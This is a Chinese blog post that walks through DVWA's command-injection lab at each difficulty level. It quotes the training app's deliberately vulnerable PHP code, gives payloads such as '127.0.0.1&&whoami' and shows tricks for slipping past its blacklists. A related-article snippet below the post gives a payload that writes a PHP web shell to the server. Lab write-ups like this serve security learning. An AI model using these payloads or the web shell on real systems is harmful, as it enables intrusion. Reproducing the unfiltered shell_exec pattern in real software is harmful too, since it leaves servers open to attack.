DVWA-Command Injection 命令注入

最新推荐文章于 2024-03-13 19:56:42 发布
最新推荐文章于 2024-03-13 19:56:42 发布
阅读量192 收藏
点赞数
分类专栏: DVWA 文章标签: web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/chenzzhenguo/article/details/108624342
版权

文章目录

Command Injection

命令注入,是指通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。

一、Low等级

1、漏洞分析

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $target = $_REQUEST[ 'ip' ];

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }

    // Feedback for the end user
    echo "<pre>{$cmd}</pre>";
}

?>
  • 对输入的ip没有任何过滤

2、使用连接符利用漏洞

  • &&前面执行成功则执行后面
  • ||前面执行失败则执行后面

127.0.0.1&&whoami

二、Medium等级

1、漏洞分析

 // Set blacklist
    $substitutions = array(
        '&&' => '',
        ';'  => '',
    );

    // Remove any of the charactars in the array (blacklist).
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );
  • 设置了简单的黑名单

2.1、利用黑名单外的连接符

  • &不管是否执行成功都会执行后面

127.0.0.1&whoami

2.2、利用黑名单漏洞

  • 因为只过滤一次,所以i构造特殊的连接符&;&这样,在经过黑名单过滤后,变成&&

127.0.0.1&;&whoami

三、High等级

1、漏洞分析

// Set blacklist
    $substitutions = array(
        '&'  => '',
        ';'  => '',
        '| ' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );
  • 进一步完善了黑名单

2、利用黑名单外的连接符

  • 发现黑名单第三组|,有空格存在。因此,直接利用|(管道符,只打印后面命令的结果)

127.0.0.1|whoami

四、Impossible等级

安全性分析

  • 加入了token验证
  • 使用stripslashes去掉反斜杠
  • 根据.将输入分成四个数组,通过is_numeric判断每个数组是否都为数字,
    判断成功后,重新组合成ip地址

利用严格的参数限制,避免了黑名单考虑不全和容易绕过的缺陷,防止了命令注入

上一篇:爆破
下一篇:跨站请求伪造

DVWA-命令注入
qq_60848021的博客
06-26 1722
命令注入漏洞的函数:system(),exec(),passthru(),shell_exec(),''(与shell_exec()功能相同。1,分析源码使用的函数是shell_exec()2,验证3,漏洞测试| :前面命令的输出结果作为后面命令的输入;||:前面的命令执行失败以后才会执行后面的命令;&:前面的命令执行后接着执行候命的命令;&&:前面的命令执行成功以后才可以执行下面的命令。存疑:当使用;连接时,出现错误原因是DVWA的服务器是winserver2008,” ; “分号是应用在linux系统中
DVWA靶场通关指南之爆破命令注入(Command Injection)篇
最新发布
2301_80845279的博客
04-21 1458
本篇文章是DVWA靶场通关指南之爆破命令注入笔记。命令注入Command Injection)是一种通过向应用程序注入恶意命令来执行非授权系统指令的攻击技术。攻击者利用输入参数或数据传输中的漏洞,将系统命令拼接到正常操作中,导致服务器执行恶意指令。
DVWA命令注入
极光时流
04-07 1281
DVWA命令注入 Low 查看源码: ip参数没有做任何的过滤就直接放在shell_exec函数中执行了,执行语句为shell_exec( 'ping 127.0.0.1 && whami ')。(linux下使用whoami查看用户命令,windows使用net user) low级别的代码接收了用户输入的ip,然后根据服务器是否是Windows NT系统,对目标ip进行...
DVWA命令注入
莫离的博客
11-15 3888
DVWACommand Injection
DVWA命令注入command injection
giun的博客
03-08 1292
一、什么是命令注入 1、概念 通过web应用程序在服务器上拼接系统命令。简单说就是注入命令是系统命令,而注入是靠连接来完成的。 常见的windows命令: ipconfig,查看本地网络 net user,查看系统用户 dir “./ ” 查看当前目录 等等 常见的命令拼接符有&amp;&amp;, &amp; ,|, || 二、尝试low等级 输入127.0.0.1发现输出的内容就是在c...
DVWA靶场-Command Injection命令注入
mlws1900的博客
03-13 1439
比如PHP中的eval()函数,可以将函数中的参数当做PHP代码来执行,如果这些函数的参数控制不严格,可能会被利用,造成任意代码执行。命令注入Command Injection漏洞也称为远程命令/代码执行漏洞(RCE,Remote Command/Code Exec),指应用程序的某些功能需要调用可以执行系统命令的函数,如果这些函数或者函数的参数能被用户控制,就可能通过命令连接符将恶意命令拼接到正常的函数中,从而随意执行系统命令,属于高危漏洞之一。我们可以利用其他管道符进行绕过,例如|,||,&符号。
DVWA系列---Command Injection命令注入
野原新之助
01-23 671
文章目录一、前言1、命令注入2、命令拼接符二、Low级别(查看源代码)三、Medium级别(查看源代码)四、High级别(查看源代码)五、Impossible级别(查看源代码)六、防御方法 一、前言 1、命令注入 命令注入漏洞主要是指服务器对来自网络的语句,没有进行严格的过滤,导致在执行合法命令的同时,也执行了一些恶意构造的非法命令,使得服务器被破坏。 通常命令注入是指os命令注入,即通过Shel...
DVWA通关--命令注入command injection
箭雨镜屋
12-13 2786
low 通关步骤 1、输入127.0.0.1试一下有没有回显 有的 2、输入127.0.0.1 | whoami 命令注入成功 3、尝试写入木马 payload:127.0.0.1 | echo "<?php assert($_POST[ele]);?>" > e1.php 这边注意,我试了echo后面的内容不加引号,或者加单引号,都没有文件生成。网上找到的echo的资料中也都是双引号。 submit之后无回显 4、服务器上看当前关卡目录下有文件e1.p
DVWA--Command injection命令注入
weixin_50342860的博客
08-19 459
目录风险lowmediumhigh修复 风险 对一些函数的参数没有进行严格的过滤,利用函数中的参数,将恶意的命令拼接到正常的命令当中,使之返回一些敏感信息。 命令连接符 command1 && command2 先执行command1后执行command2 command1 | command2 只执行command2 command1 & command2 先执行command2后执行command1 以上三种连接符在windows和linux环境下都
DVWA------命令注入
qq_42527761的博客
08-07 294
简介工具测试方法Low等级Medium等级High等级 简介 命令注入是通过在应用程序中注入和执行宿主操作系统的命令,来达到破坏目的的一种攻击方式,由应用程序传递操作系统命令会赋有和应用一样的权限。 命令注入攻击漏洞是PHP应用程序中常见的漏洞之一。 命令注入和代码注入不同,代码注入的目的在于将外部代码注入应用程序本身,并随程序执行;命令攻击的对象是服务器的宿主机。 工具 firefox浏览器 测试方法 Low等级 将DVWA安全等级调为Low等级 Low等级对输入并没有进行任何的过滤。 在输入.
DVWAcommand injection
__52Hz__
07-28 1368
原文地址:http://www.fwqtg.net/注入技术-dvwa命令注入.html (转载了部分内容) Command Injection,即命令注入攻击,是指由于Web应用程序对用户提交的数据过滤不严格,导致黑客可以通过构造特殊命令字符串的方式,将数据提交至Web应用程序中,并利用该方式执行外部程序或系统命令实施攻击,非法获取数据或者网络资源等。 一
DVWACommand Injection命令注入
RexHa的博客
09-29 1282
DVWA命令注入三个等级通关
DVWA-命令注入Command Injection
weixin_58954236的博客
08-19 701
ipconfig,net user(查看系统用户),dir(查看当前目录),find(查找包含指定字符的行),whoami(查看系统当前有效用户名)A&B(简单的拼接,AB之间无制约关系),A&&B(A执行成功才会执行B),A|B(A的输出作为B的输入),A||B(A执行失败,然后才会执行B)
DVWA —— Command Injection 命令注入
YouTheFreedom的博客
05-21 533
命令执行漏洞是指代码未对用户可控参数做过滤,导致直接带入执行命令的代码中,对恶意构造的语句,可被用来执行任意命令。黑客可在服务器上执行任意命令,写入后门,从而入侵服务器,获取服务器的管理员权限,危害巨大。
DVWA命令注入Command Injection
chtdgf的博客
01-31 1787
DVWA命令注入Command Injection) 1.解决乱码问题 在文本框中输入”ip address”后结果显示为乱码,如下图所示。 解决此问题的方法:在DVWA-master\dvwa\includes目录下找到dvwaPage.inc.php文件中所有的”charset=utf-8”,修改”charset=gb2312” 2.基础知识 &&这个就是我们经常说的and,cmd1&&cmd2意思为当cmd1执行成功以后才执行cmd2,否则不执行cmd2 &a
DVWA命令注入Command Injection
qq_54537919的博客
06-25 884
DVWA命令注入Command Injection) 原理 low、 medium、 high
Web安全 学习日记10 - DVWA 命令注入Command Injection
qq_46081990的博客
03-15 360
命令注入就是在需要输入数据的地方输入了恶意代码,而且系统并没有对其进行过滤或者其他处理导致恶意代码也被执行,最终导致数据泄露或者正常数据被破坏。
Kali Linux中使用XAMPP搭建DVWACommand Injection实战
"在Kali Linux环境下利用XAMPP搭建DVWA并进行Command Injection实践" 在信息安全领域,DVWA(Damn Vulnerable Web Application)是一个流行的学习和测试Web应用程序安全漏洞的平台。本教程将指导你如何在Kali Linux...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值